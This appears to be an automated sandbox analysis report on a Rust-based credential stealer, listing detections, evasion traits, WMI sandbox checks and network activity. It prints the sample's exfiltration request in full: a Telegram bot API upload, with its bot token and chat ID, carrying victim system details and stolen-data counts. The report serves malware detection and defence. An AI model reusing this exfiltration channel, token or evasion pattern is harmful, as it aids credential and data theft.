Windows Analysis Report
cOQD62FceM.exe

Overview

General Information

Sample name: cOQD62FceM.exe (renamed because original name is a hash value)
Original sample name: 17b420104131c59619411e4732743ec8e9c373228613ee23731c1fd239fac7dd.exe
Analysis ID: 1450352
MD5: af412b399914b80044340ade572bf2ab
SHA1: 448557087815068ea337905a61f83f02eee47c07
SHA256: 17b420104131c59619411e4732743ec8e9c373228613ee23731c1fd239fac7dd
Tags: exe, RustyStealer

Detection

Luca Stealer, Rusty Stealer
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Luca Stealer
Yara detected Rusty Stealer
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses the Telegram API (likely for C&C communication)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara detected Credential Stealer

Classification

  • System is w10x64
  • cOQD62FceM.exe (PID: 6176 cmdline: "C:\Users\user\Desktop\cOQD62FceM.exe" MD5: AF412B399914B80044340ADE572BF2AB)
    • powershell.exe (PID: 2352 cmdline: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
cOQD62FceM.exe | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security |
00000000.00000000.2016098986.00007FF747A80000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security |
Process Memory Space: cOQD62FceM.exe PID: 6176 | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security |
Process Memory Space: cOQD62FceM.exe PID: 6176 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: cOQD62FceM.exe PID: 6176 | JoeSecurity_RustyStealer | Yara detected Rusty Stealer | Joe Security |
0.0.cOQD62FceM.exe.7ff747670000.0.unpack | JoeSecurity_LucaStealer | Yara detected Luca Stealer | Joe Security |
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", CommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\cOQD62FceM.exe", ParentImage: C:\Users\user\Desktop\cOQD62FceM.exe, ParentProcessId: 6176, ParentProcessName: cOQD62FceM.exe, ProcessCommandLine: "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName", ProcessId: 2352, ProcessName: powershell.exe
No Snort rule has matched

AV Detection

Source: cOQD62FceM.exe | Avira: detected
Source: cOQD62FceM.exe | ReversingLabs: Detection: 50%
Source: cOQD62FceM.exe | Virustotal: Detection: 54%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 71.0% probability
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: cOQD62FceM.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: Glmp.pdb~ source: cOQD62FceM.exe, 00000000.00000003.2603838350.00000190B8ACE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2560184818.00000190B8AE0000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2511389586.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2496954630.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2573841982.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000002.2606122999.00000190B8ACE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2544571824.00000190B8AE1000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2537909337.00000190B8AE0000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2497099394.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2496766112.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2499111187.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2563025143.00000190B8AE1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: lmp.pdb source: cOQD62FceM.exe, 00000000.00000003.2603838350.00000190B8ACE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2560184818.00000190B8AE0000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2511389586.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2496954630.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2573841982.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000002.2606122999.00000190B8ACE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2544571824.00000190B8AE1000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2537909337.00000190B8AE0000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2497099394.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2496766112.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2499111187.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2563025143.00000190B8AE1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\* source: cOQD62FceM.exe, 00000000.00000003.2560184818.00000190B8AE0000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2511389586.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2496954630.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2573841982.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2544571824.00000190B8AE1000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2537909337.00000190B8AE0000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2497099394.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2496766112.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2499111187.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2563025143.00000190B8AE1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*60\* source: cOQD62FceM.exe, 00000000.00000003.2560184818.00000190B8AE0000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2511389586.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2496954630.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2573841982.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2544571824.00000190B8AE1000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2537909337.00000190B8AE0000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2497099394.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2496766112.00000190B8ADE000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2499111187.00000190B8ADF000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2563025143.00000190B8AE1000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\

Networking

Source: unknown | DNS query: name: api.telegram.org
              Source: global trafficHTTP traffic detected: POST /bot6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA/sendDocument?chat_id=-4003506161&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20173.254.250.91%0ACountry:%20United%20States%0ACity:%20Dallas%0APostal:%2075201%0AISP:%20Quadranet%20Enterprises%20LLC%20-%20A8100%0ATimezone:%20-05:00%0A%0A-%20PC%20Info%20-%0A%0AUsername:%20user%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%20E26RT4853%20(1280,%201024)%0AHWID:%205059308222394286%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\cOQD62FceM.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0A%0ABuild:_____%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%202%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2040%0ACredit%20Cards:%20%E2%9D%8C%0AServers%20FTP/SSH:%20%E2%9D%8C%0ADiscord%20Tokens:%20%E2%9D%8C%0AOthers:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1content-type: multipart/form-data; boundary=4ee1a642069b7585-40d3276220905d9c-7e8720fa17384bed-798f4ce62581489acontent-length: 980180accept: */*host: api.telegram.org
Source: global traffic | HTTP traffic detected: GET /?output=json HTTP/1.1; accept: */*; host: ipwho.is
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 195.201.57.90
Source: Joe Sandbox View | ASN Name: TELEGRAMRU
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: ipwho.is
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: ipwho.is
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: cOQD62FceM.exe, 00000000.00000003.2603838350.00000190B8A93000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000002.2606122999.00000190B8A93000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA/sendDocument?chat_id=
Source: cOQD62FceM.exe, 00000000.00000003.2590558371.00000190BA826000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000002.2606869052.00000190BA826000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot6639722633:AAFNcbBsUJUAQOXZmv9IESvAjulFnDaVzUA/sendDocument?chat_id=-400
Source: cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: cOQD62FceM.exe, 00000000.00000003.2603838350.00000190B8A93000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000002.2606122999.00000190B8A93000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ipwhois.io/flags/us.svg
Source: cOQD62FceM.exe, 00000000.00000003.2603838350.00000190B8A93000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000002.2606122999.00000190B8A93000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ipwhois.io/flags/us.svg%
Source: cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: cOQD62FceM.exe | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-supportCalling
Source: cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: cOQD62FceM.exe, 00000000.00000003.2496695293.00000190BA8A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: cOQD62FceM.exe | Binary string: \Device\Afd\Mio
Source: cOQD62FceM.exe | Binary string: Failed to open \Device\Afd\Mio: `
Source: classification engine | Classification label: mal96.troj.spyw.evad.winEXE@4/14@2/2
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.db
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3040:120:WilError_03
Source: C:\Users\user\Desktop\cOQD62FceM.exe | File created: C:\Users\user\AppData\Local\Temp\9DMSrrSd60FuQRZgziegQPPZtZIXfV\
Source: cOQD62FceM.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\cOQD62FceM.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: cOQD62FceM.exe, 00000000.00000000.2016098986.00007FF747A80000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: cOQD62FceM.exe, 00000000.00000000.2016098986.00007FF747A80000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: cOQD62FceM.exe, 00000000.00000000.2016098986.00007FF747A80000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: cOQD62FceM.exe, 00000000.00000000.2016098986.00007FF747A80000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: cOQD62FceM.exe, 00000000.00000000.2016098986.00007FF747A80000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: cOQD62FceM.exe, 00000000.00000000.2016098986.00007FF747A80000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: cOQD62FceM.exe, 00000000.00000003.2496329250.00000190B8AE9000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000003.2497256894.00000190BA832000.00000004.00000020.00020000.00000000.sdmp, Login Data.0.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: cOQD62FceM.exe, 00000000.00000000.2016098986.00007FF747A80000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: cOQD62FceM.exe, 00000000.00000003.2603838350.00000190B8A93000.00000004.00000020.00020000.00000000.sdmp, cOQD62FceM.exe, 00000000.00000002.2606122999.00000190B8A93000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT Name,CurrentHorizontalResolution, CurrentVerticalResolution FROM Win32_VideoControlleres;C:\Wind
Source: unknown | Process created: C:\Users\user\Desktop\cOQD62FceM.exe "C:\Users\user\Desktop\cOQD62FceM.exe"
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Section loaded: cryptnet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\cOQD62FceM.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: cOQD62FceM.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: cOQD62FceM.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: cOQD62FceM.exe | Static file information: File size 5484544 > 1048576
Source: cOQD62FceM.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x3ba600
Source: cOQD62FceM.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x15d000
              Source: cOQD62FceM.exe :: Static PE information: section name: _RDATA
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Process information set: NOOPENFILEERRORBOX (identical entry repeated 71 times in the original report)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Thread delayed: delay time: 922337203685477 (2x)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Window / User API: threadDelayed 2734
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Window / User API: threadDelayed 3318
              Source: C:\Users\user\Desktop\cOQD62FceM.exe TID: 1352 :: Thread sleep time: -35000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6588 :: Thread sleep count: 2734 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6588 :: Thread sleep count: 3318 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1576 :: Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7060 :: Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: Thread delayed: delay time: 35000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe :: Thread delayed: delay time: 922337203685477 (2x)
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: File opened: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: File opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\
              Source: C:\Users\user\Desktop\cOQD62FceM.exe :: File opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\
              Source: Web Data.0.dr :: Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: Web Data.0.dr :: Binary or memory string: discord.comVMware20,11696428655f
              Source: Web Data.0.dr :: Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: Web Data.0.dr :: Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: Web Data.0.dr :: Binary or memory string: global block list test formVMware20,11696428655
              Source: Web Data.0.dr :: Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: Web Data.0.dr :: Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
